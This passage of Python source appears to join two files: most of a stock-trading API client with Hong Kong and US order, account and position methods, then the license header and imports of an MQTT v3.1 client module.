return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(OrderBookQuery.pack_req,
OrderBookQuery.unpack_rsp,
)
kargs = {"stock_str": code}
ret_code, msg, orderbook = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
return RET_OK, orderbook
def get_suspension_info(self, codes, start='', end=''):
'''
指定时间段,获某一支股票的停牌日期
:param codes: 股票code
:param start: 开始时间 '%Y-%m-%d'
:param end: 结束时间 '%Y-%m-%d'
:return: (ret, data) ret == 0 data为pd dataframe数据, 表头'code' 'suspension_dates'(逗号分隔的多个日期字符串)
ret != 0 data为错误字符串
'''
req_codes = unique_and_normalize_list(codes)
if not codes:
error_str = ERROR_STR_PREFIX + "the type of code param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(SuspensionQuery.pack_req,
SuspensionQuery.unpack_rsp,
)
kargs = {"codes": req_codes, "start": str(start), "end": str(end)}
ret_code, msg, susp_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'suspension_dates']
pd_frame = pd.DataFrame(susp_list, columns=col_list)
return RET_OK, pd_frame
def get_multi_points_history_kline(self, codes, dates, fields, ktype='K_DAY', autype='qfq', no_data_mode=KL_NO_DATA_MODE_FORWARD):
'''
获取多支股票多个时间点的指定数据列
:param codes: 单个或多个股票 'HK.00700' or ['HK.00700', 'HK.00001']
:param dates: 单个或多个日期 '2017-01-01' or ['2017-01-01', '2017-01-02']
:param fields:单个或多个数据列 KL_FIELD.ALL or [KL_FIELD.DATE_TIME, KL_FIELD.OPEN]
:param ktype: K线类型
:param autype:复权类型
:param no_data_mode: 指定时间为非交易日时,对应的k线数据取值模式,
:return: pd frame 表头与指定的数据列相关, 固定表头包括'code'(代码) 'time_point'(指定的日期) 'data_valid' (0=无数据 1=请求点有数据 2=请求点无数据,取前一个)
'''
req_codes = unique_and_normalize_list(codes)
if not codes:
error_str = ERROR_STR_PREFIX + "the type of code param is wrong"
return RET_ERROR, error_str
req_dates = unique_and_normalize_list(dates)
if not dates:
error_str = ERROR_STR_PREFIX + "the type of dates param is wrong"
return RET_ERROR, error_str
req_fields = unique_and_normalize_list(fields)
if not fields:
req_fields = copy(KL_FIELD.ALL_REAL)
req_fields = KL_FIELD.normalize_field_list(req_fields)
if not req_fields:
error_str = ERROR_STR_PREFIX + "the type of fields param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(MultiPointsHisKLine.pack_req,
MultiPointsHisKLine.unpack_rsp)
all_num = max(1, len(req_dates) * len(req_codes))
one_num = max(1, len(req_dates))
max_data_num = 500
max_kl_num = all_num if all_num <= max_data_num else int(max_data_num / one_num) * one_num
if 0 == max_kl_num:
error_str = ERROR_STR_PREFIX + "too much data to req"
return RET_ERROR, error_str
data_finish = False
list_ret = []
# 循环请求数据,避免一次性取太多超时
while not data_finish:
print('get_multi_points_history_kline - wait ... %s' % datetime.now())
kargs = {"codes": req_codes, "dates": req_dates, "fields": req_fields, "ktype": ktype, "autype": autype, "max_num": max_kl_num, "no_data_mode":no_data_mode}
ret_code, msg, content = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
list_kline, has_next = content
data_finish = (not has_next)
for dict_item in list_kline:
item_code = dict_item['code']
if has_next and item_code in req_codes:
req_codes.remove(item_code)
list_ret.append(dict_item)
if 0 == len(req_codes):
data_finish = True
# 表头列
col_list = ['code', 'time_point', 'data_valid']
for field in req_fields:
str_field = KL_FIELD.DICT_KL_FIELD_STR[field]
if str_field not in col_list:
col_list.append(str_field)
pd_frame = pd.DataFrame(list_ret, columns=col_list)
return RET_OK, pd_frame
class SafeTradeSubscribeList:
def __init__(self):
self._list_sub = []
self._lock = RLock()
def add_val(self, orderid, envtype):
self._lock.acquire()
self._list_sub.append((str(orderid), int(envtype)))
self._lock.release()
def has_val(self, orderid, envtype):
ret_val = False
self._lock.acquire()
if (str(orderid), int(envtype)) in self._list_sub:
ret_val = True
self._lock.release()
return ret_val
def del_val(self, orderid, envtype):
self._lock.acquire()
key = (str(orderid), int(envtype))
if key in self._list_sub:
self._list_sub.remove(key)
self._lock.release()
def copy(self):
list_ret = None
self._lock.acquire()
list_ret = [i for i in self._list_sub]
self._lock.release()
return list_ret
class OpenHKTradeContext(OpenContextBase):
"""Class for set context of HK stock trade"""
cookie = 100000
def __init__(self, host="127.0.0.1", port=11111):
self._ctx_unlock = None
self._obj_order_sub = SafeTradeSubscribeList()
super(OpenHKTradeContext, self).__init__(host, port, True, True)
self.set_pre_handler(HKTradeOrderPreHandler(self))
def close(self):
"""
to call close old obj before loop create new, otherwise socket will encounter erro 10053 or more!
"""
super(OpenHKTradeContext, self).close()
def on_api_socket_reconnected(self):
"""for API socket reconnected"""
# auto unlock
if self._ctx_unlock is not None:
for i in range(3):
password, password_md5 = self._ctx_unlock
ret, data = self.unlock_trade(password, password_md5)
if ret == RET_OK:
break
sleep(1)
# auto subscribe order deal push
list_sub = self._obj_order_sub.copy()
dic_order = {}
list_zero_order_env = []
for (orderid, envtype) in list_sub:
if str(orderid) == u'':
list_zero_order_env.append(envtype)
continue
if envtype not in dic_order:
dic_order[envtype] = []
dic_order[envtype].append(orderid)
for envtype in dic_order:
self._subscribe_order_deal_push(dic_order[envtype], True, True, envtype)
# use orderid blank to subscrible all order
for envtype in list_zero_order_env:
self._subscribe_order_deal_push([], True, False, envtype)
def on_trade_order_check(self, orderid, envtype, status):
'''multi thread notify order finish after subscribe order push'''
if is_HKTrade_order_status_finish(status):
self._obj_order_sub.del_val(orderid=orderid, envtype=envtype)
elif (not self._obj_order_sub.has_val(orderid, envtype)) and self._obj_order_sub.has_val(u'', envtype):
self._obj_order_sub.add_val(orderid, envtype) #record info for subscribe order u''
def _subscribe_order_deal_push(self, orderid_list, order_deal_push=True, push_atonce=True, envtype=0):
"""subscribe order for recv push data"""
for orderid in orderid_list:
if order_deal_push is False:
self._obj_order_sub.del_val(orderid, envtype)
else:
self._obj_order_sub.add_val(orderid, envtype)
ret_code, _, push_req_str = TradePushQuery.hk_pack_subscribe_req(
str(self.cookie), str(envtype), orderid_list, str(int(order_deal_push)), str(int(push_atonce)))
if ret_code == RET_OK:
ret_code, _ = self._send_async_req(push_req_str)
return ret_code
def unlock_trade(self, password, password_md5=None):
'''
交易解锁,安全考虑,所有的交易api,需成功解锁后才可操作
:param password: 明文密码字符串 (二选一)
:param password_md5: 密码的md5字符串(二选一)
:return:(ret, data) ret == 0 时, data为None
ret != 0 时, data为错误字符串
'''
query_processor = self._get_sync_query_processor(UnlockTrade.pack_req,
UnlockTrade.unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'password': str(password) if password else '',
'password_md5': str(password_md5) if password_md5 else ''}
ret_code, msg, unlock_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
# reconnected to auto unlock
if RET_OK == ret_code:
self._ctx_unlock = (password, password_md5)
# unlock push socket
ret_code, msg, push_req_str = UnlockTrade.pack_req(**kargs)
if ret_code == RET_OK:
self._send_async_req(push_req_str)
return RET_OK, None
def subscribe_order_deal_push(self, orderid_list, order_deal_push=True, envtype=0):
"""
subscribe_order_deal_push
"""
if not TRADE.check_envtype_hk(envtype):
return RET_ERROR
list_sub = [u'']
if orderid_list is None:
list_sub = [u'']
elif isinstance(orderid_list, list):
list_sub = [str(x) for x in orderid_list]
else:
list_sub = [str(orderid_list)]
return self._subscribe_order_deal_push(list_sub, order_deal_push, True, envtype)
def place_order(self, price, qty, strcode, orderside, ordertype=0, envtype=0, order_deal_push=False):
"""
place order
use set_handle(HKTradeOrderHandlerBase) to recv order push !
"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
error_str = content
return RET_ERROR, error_str, None
market_code, stock_code = content
if int(market_code) != 1:
error_str = ERROR_STR_PREFIX + "the type of stocks is wrong "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(PlaceOrder.hk_pack_req,
PlaceOrder.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype), 'orderside': str(orderside),
'ordertype': str(ordertype), 'price': str(price), 'qty': str(qty), 'strcode': str(stock_code)}
ret_code, msg, place_order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
# handle order push
self._subscribe_order_deal_push(orderid_list=[place_order_list[0]['orderid']],
order_deal_push=order_deal_push, envtype=envtype)
col_list = ["envtype", "orderid", "code", "stock_name", "dealt_avg_price", "dealt_qty", "qty",
"order_type", "order_side", "price", "status", "submited_time", "updated_time"]
place_order_table = pd.DataFrame(place_order_list, columns=col_list)
return RET_OK, place_order_table
def set_order_status(self, status, orderid=0, envtype=0):
"""for setting the status of order"""
if int(status) not in TRADE.REV_ORDER_STATUS:
error_str = ERROR_STR_PREFIX + "the type of status is wrong "
return RET_ERROR, error_str
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(SetOrderStatus.hk_pack_req,
SetOrderStatus.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype), 'localid': str(0),
'orderid': str(orderid), 'status': str(status)}
ret_code, msg, set_order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ['envtype', 'orderID']
set_order_table = pd.DataFrame(set_order_list, columns=col_list)
return RET_OK, set_order_table
def change_order(self, price, qty, orderid=0, envtype=0):
"""for changing the order"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(ChangeOrder.hk_pack_req,
ChangeOrder.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype), 'localid': str(0),
'orderid': str(orderid), 'price': str(price), 'qty': str(qty)}
ret_code, msg, change_order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ['envtype', 'orderID']
change_order_table = pd.DataFrame(change_order_list, columns=col_list)
return RET_OK, change_order_table
def accinfo_query(self, envtype=0):
"""
query account information
:param envtype: trading environment parameters,0 means real transaction and 1 means simulation trading
:return:error return RET_ERROR,msg and ok return RET_OK,ret
"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(AccInfoQuery.hk_pack_req,
AccInfoQuery.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype)}
ret_code, msg, accinfo_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ['Power', 'ZCJZ', 'ZQSZ', 'XJJY', 'KQXJ', 'DJZJ', 'ZSJE', 'ZGJDE', 'YYJDE', 'GPBZJ']
accinfo_frame_table = pd.DataFrame(accinfo_list, columns=col_list)
return RET_OK, accinfo_frame_table
def order_list_query(self, orderid="", statusfilter="", strcode='', start='', end='', envtype=0):
"""for querying the order list"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(OrderListQuery.hk_pack_req,
OrderListQuery.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'orderid': str(orderid),
'statusfilter': str(statusfilter),
'strcode': str(stock_code),
'start': str(start),
'end': str(end),
'envtype': str(envtype)}
ret_code, msg, order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "dealt_avg_price", "dealt_qty", "qty",
"orderid", "order_type", "order_side", "price",
"status", "submited_time", "updated_time"]
order_list_table = pd.DataFrame(order_list, columns=col_list)
return RET_OK, order_list_table
def position_list_query(self, strcode='', stocktype='', pl_ratio_min='',
pl_ratio_max='', envtype=0):
"""for querying the position list"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(PositionListQuery.hk_pack_req,
PositionListQuery.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'strcode': str(stock_code),
'stocktype': str(stocktype),
'pl_ratio_min': str(pl_ratio_min),
'pl_ratio_max': str(pl_ratio_max),
'envtype': str(envtype)}
ret_code, msg, position_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "qty", "can_sell_qty", "cost_price",
"cost_price_valid", "market_val", "nominal_price", "pl_ratio",
"pl_ratio_valid", "pl_val", "pl_val_valid", "today_buy_qty",
"today_buy_val", "today_pl_val", "today_sell_qty", "today_sell_val"]
position_list_table = pd.DataFrame(position_list, columns=col_list)
return RET_OK, position_list_table
def deal_list_query(self, envtype=0):
"""for querying deal list"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(DealListQuery.hk_pack_req,
DealListQuery.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype)}
ret_code, msg, deal_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
# "orderside" 保留是为了兼容旧版本, 对外文档统一为"order_side"
col_list = ["code", "stock_name", "dealid", "orderid",
"qty", "price", "orderside", "time", "order_side"]
deal_list_table = pd.DataFrame(deal_list, columns=col_list)
return RET_OK, deal_list_table
def history_order_list_query(self, statusfilter='', strcode='', start='', end='', envtype=0):
"""for querying the order list"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(HistoryOrderListQuery.hk_pack_req,
HistoryOrderListQuery.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'statusfilter': str(statusfilter),
'strcode': str(stock_code),
'start': str(start),
'end': str(end),
'envtype': str(envtype)}
ret_code, msg, order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "dealt_qty", "qty",
"orderid", "order_type", "order_side", "price",
"status", "submited_time", "updated_time"]
order_list_table = pd.DataFrame(order_list, columns=col_list)
return RET_OK, order_list_table
def history_deal_list_query(self, strcode, start, end, envtype=0):
"""for querying deal list"""
if not TRADE.check_envtype_hk(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(HistoryDealListQuery.hk_pack_req,
HistoryDealListQuery.hk_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'strcode': str(stock_code),
'start': str(start),
'end': str(end),
'envtype': str(envtype)}
ret_code, msg, deal_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "dealid", "orderid", "qty", "price",
"order_side", "time", "contra_broker_id", "contra_broker_name"]
deal_list_table = pd.DataFrame(deal_list, columns=col_list)
return RET_OK, deal_list_table
def login_new_account(self, user_id, login_password_md5, trade_password, trade_password_md5=None):
'''
自动登陆一个新的牛牛帐号
:param user_id: 牛牛号
:param login_password_md5: 新帐号的登陆密码的md5值
:param trade_password: 新帐号的交易密码
:param trade_password_md5: 新帐号的交易密码的md5值 (跟交易密码二选一)
:return:
'''
query_processor = self._get_sync_query_processor(LoginNewAccountQuery.pack_req,
LoginNewAccountQuery.unpack_rsp)
kargs = {'cookie': str(self.cookie),
'user_id': str(user_id),
'password_md5': str(login_password_md5)
}
# 切换帐号,必然会断线,故判断ret_code 无意义
try:
query_processor(**kargs)
except Exception as e:
pass
# 触发重连等待
self.get_global_state()
# 接下来就是解锁交易密码
ret = RET_OK
data = ''
if trade_password or trade_password_md5:
ret, data = self.unlock_trade(trade_password, trade_password_md5)
else:
self._ctx_unlock = None
return ret, data
class OpenUSTradeContext(OpenContextBase):
"""Class for set context of US stock trade"""
cookie = 100000
def __init__(self, host="127.0.0.1", port=11111):
self._ctx_unlock = None
self._obj_order_sub = SafeTradeSubscribeList()
super(OpenUSTradeContext, self).__init__(host, port, True, True)
self.set_pre_handler(USTradeOrderPreHandler(self))
def close(self):
"""
to call close old obj before loop create new, otherwise socket will encounter erro 10053 or more!
"""
super(OpenUSTradeContext, self).close()
def on_api_socket_reconnected(self):
"""for api socket reconnected"""
# auto unlock
if self._ctx_unlock is not None:
for i in range(3):
password, password_md5 = self._ctx_unlock
ret, data = self.unlock_trade(password, password_md5)
if ret == RET_OK:
break
# auto subscribe order deal push
list_sub = self._obj_order_sub.copy()
dic_order = {}
list_zero_order_env = []
for (orderid, envtype) in list_sub:
if str(orderid) == u'':
list_zero_order_env.append(envtype)
continue
if envtype not in dic_order:
dic_order[envtype] = []
dic_order[envtype].append(orderid)
for envtype in dic_order:
self._subscribe_order_deal_push(dic_order[envtype], True, True, envtype)
# use orderid blank to subscrible all order
for envtype in list_zero_order_env:
self._subscribe_order_deal_push([], True, False, envtype)
def on_trade_order_check(self, orderid, envtype, status):
'''multi thread notify order finish after subscribe order push'''
if is_USTrade_order_status_finish(status):
self._obj_order_sub.del_val(orderid=orderid, envtype=envtype)
elif (not self._obj_order_sub.has_val(orderid, envtype)) and self._obj_order_sub.has_val(u'', envtype):
self._obj_order_sub.add_val(orderid, envtype) # record info for subscribe order u''
def _subscribe_order_deal_push(self, orderid_list, order_deal_push=True, push_atonce=True, envtype=0):
"""subscribe order for recv push data"""
for orderid in orderid_list:
if order_deal_push is False:
self._obj_order_sub.del_val(orderid, envtype)
else:
self._obj_order_sub.add_val(orderid, envtype)
ret_code, _, push_req_str = TradePushQuery.us_pack_subscribe_req(
str(self.cookie), str(envtype), orderid_list, str(int(order_deal_push)), str(int(push_atonce)))
if ret_code == RET_OK:
ret_code, _ = self._send_async_req(push_req_str)
return ret_code
def unlock_trade(self, password, password_md5=None):
'''
交易解锁,安全考虑,所有的交易api,需成功解锁后才可操作
:param password: 明文密码字符串 (二选一)
:param password_md5: 密码的md5字符串(二选一)
:return:(ret, data) ret == 0 时, data为None
ret != 0 时, data为错误字符串
'''
query_processor = self._get_sync_query_processor(UnlockTrade.pack_req,
UnlockTrade.unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'password': str(password), 'password_md5': str(password_md5)}
ret_code, msg, unlock_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
# reconnected to auto unlock
if RET_OK == ret_code:
self._ctx_unlock = (password, password_md5)
# unlock push socket
ret_code, msg, push_req_str = UnlockTrade.pack_req(**kargs)
if ret_code == RET_OK:
self._send_async_req(push_req_str)
return RET_OK, None
def subscribe_order_deal_push(self, orderid_list, order_deal_push=True, envtype=0):
"""
subscribe_order_deal_push
"""
if not TRADE.check_envtype_us(envtype):
return RET_ERROR
list_sub = [u'']
if orderid_list is None:
list_sub = [u'']
elif isinstance(orderid_list, list):
list_sub = [str(x) for x in orderid_list]
else:
list_sub = [str(orderid_list)]
return self._subscribe_order_deal_push(list_sub, order_deal_push, True, envtype)
def place_order(self, price, qty, strcode, orderside, ordertype=2, envtype=0, order_deal_push=False):
"""
place order
use set_handle(USTradeOrderHandlerBase) to recv order push !
"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
error_str = content
return RET_ERROR, error_str, None
market_code, stock_code = content
if int(market_code) != 2:
error_str = ERROR_STR_PREFIX + "the type of stocks is wrong "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(PlaceOrder.us_pack_req,
PlaceOrder.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype), 'orderside': str(orderside),
'ordertype': str(ordertype), 'price': str(price), 'qty': str(qty), 'strcode': str(stock_code)}
ret_code, msg, place_order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
# handle order push
self._subscribe_order_deal_push(orderid_list=[place_order_list[0]['orderid']],
order_deal_push=order_deal_push, envtype=envtype)
col_list = ["envtype", "orderid", "code", "stock_name", "dealt_avg_price", "dealt_qty", "qty",
"order_type", "order_side", "price", "status", "submited_time", "updated_time"]
place_order_table = pd.DataFrame(place_order_list, columns=col_list)
return RET_OK, place_order_table
def set_order_status(self, status=0, orderid=0, envtype=0):
"""for setting the statusof order"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
if int(status) != 0:
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support cancel order "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(SetOrderStatus.us_pack_req,
SetOrderStatus.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype), 'localid': str(0),
'orderid': str(orderid), 'status': '0'}
ret_code, msg, set_order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ['envtype', 'orderID']
set_order_table = pd.DataFrame(set_order_list, columns=col_list)
return RET_OK, set_order_table
def change_order(self, price, qty, orderid=0, envtype=0):
"""for changing the order"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(ChangeOrder.us_pack_req,
ChangeOrder.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype), 'localid': str(0),
'orderid': str(orderid), 'price': str(price), 'qty': str(qty)}
ret_code, msg, change_order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ['envtype', 'orderID']
change_order_table = pd.DataFrame(change_order_list, columns=col_list)
return RET_OK, change_order_table
def accinfo_query(self, envtype=0):
"""for querying the information of account"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(AccInfoQuery.us_pack_req,
AccInfoQuery.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype)}
ret_code, msg, accinfo_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ['Power', 'ZCJZ', 'ZQSZ', 'XJJY', 'KQXJ', 'DJZJ', 'ZSJE', 'ZGJDE', 'YYJDE', 'GPBZJ']
accinfo_frame_table = pd.DataFrame(accinfo_list, columns=col_list)
return RET_OK, accinfo_frame_table
def order_list_query(self, orderid="", statusfilter="", strcode='', start='', end='', envtype=0):
"""for querying order list"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(OrderListQuery.us_pack_req,
OrderListQuery.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'orderid': str(orderid),
'statusfilter': str(statusfilter),
'strcode': str(stock_code),
'start': str(start),
'end': str(end),
'envtype': str(envtype)}
ret_code, msg, order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "dealt_avg_price", "dealt_qty", "qty",
"orderid", "order_type", "order_side", "price",
"status", "submited_time", "updated_time"]
order_list_table = pd.DataFrame(order_list, columns=col_list)
return RET_OK, order_list_table
def position_list_query(self, strcode='', stocktype='', pl_ratio_min='',
pl_ratio_max='', envtype=0):
"""for querying the position"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(PositionListQuery.us_pack_req,
PositionListQuery.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'strcode': str(stock_code),
'stocktype': str(stocktype),
'pl_ratio_min': str(pl_ratio_min),
'pl_ratio_max': str(pl_ratio_max),
'envtype': str(envtype)}
ret_code, msg, position_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "qty", "can_sell_qty", "cost_price",
"cost_price_valid", "market_val", "nominal_price", "pl_ratio",
"pl_ratio_valid", "pl_val", "pl_val_valid", "today_buy_qty",
"today_buy_val", "today_pl_val", "today_sell_qty", "today_sell_val"]
position_list_table = pd.DataFrame(position_list, columns=col_list)
return RET_OK, position_list_table
def deal_list_query(self, envtype=0):
"""for querying the deal list"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(DealListQuery.us_pack_req,
DealListQuery.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype)}
ret_code, msg, deal_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
#"orderside" 保留是为了兼容旧版本, 对外文档统一为"order_side"
col_list = ["code", "stock_name", "dealid", "orderid",
"qty", "price", "orderside", "time", "order_side"]
deal_list_table = pd.DataFrame(deal_list, columns=col_list)
return RET_OK, deal_list_table
def history_order_list_query(self, statusfilter='', strcode='', start='', end='', envtype=0):
"""for querying order list"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(HistoryOrderListQuery.us_pack_req,
HistoryOrderListQuery.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'statusfilter': str(statusfilter),
'strcode': str(stock_code),
'start': str(start),
'end': str(end),
'envtype': str(envtype)}
ret_code, msg, order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "dealt_qty", "qty",
"orderid", "order_type", "order_side", "price",
"status", "submited_time", "updated_time"]
order_list_table = pd.DataFrame(order_list, columns=col_list)
return RET_OK, order_list_table
def history_deal_list_query(self, strcode, start, end, envtype=0):
"""for querying deal list"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(HistoryDealListQuery.us_pack_req,
HistoryDealListQuery.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'strcode': str(stock_code),
'start': str(start),
'end': str(end),
'envtype': str(envtype)}
ret_code, msg, deal_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "dealid", "orderid",
"qty", "price", "order_side", "time"]
deal_list_table = pd.DataFrame(deal_list, columns=col_list)
return RET_OK, deal_list_table
|
client.py
|
# Copyright (c) 2012-2014 Roger Light <roger@atchoo.org>
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# and Eclipse Distribution License v1.0 which accompany this distribution.
#
# The Eclipse Public License is available at
# http://www.eclipse.org/legal/epl-v10.html
# and the Eclipse Distribution License is available at
# http://www.eclipse.org/org/documents/edl-v10.php.
#
# Contributors:
# Roger Light - initial API and implementation
"""
This is an MQTT v3.1 client module. MQTT is a lightweight pub/sub messaging
protocol that is easy to implement and suitable for low powered devices.
"""
import collections
import errno
import os
import platform
import select
import socket
try:
import ssl
except ImportError:
ssl = None
import struct
import sys
import threading
import time
import uuid
import base64
import string
import hashlib
import logging
try:
# Use monotonic clock if available
time_func = time.monotonic
except AttributeError:
time_func = time.time
try:
import dns.resolver
except ImportError:
HAVE_DNS = False
else:
HAVE_DNS = True
from .matcher import MQTTMatcher
if platform.system() == 'Windows':
EAGAIN = errno.WSAEWOULDBLOCK
else:
EAGAIN = errno.EAGAIN
MQTTv31 = 3
MQTTv311 = 4
if sys.version_info[0] >= 3:
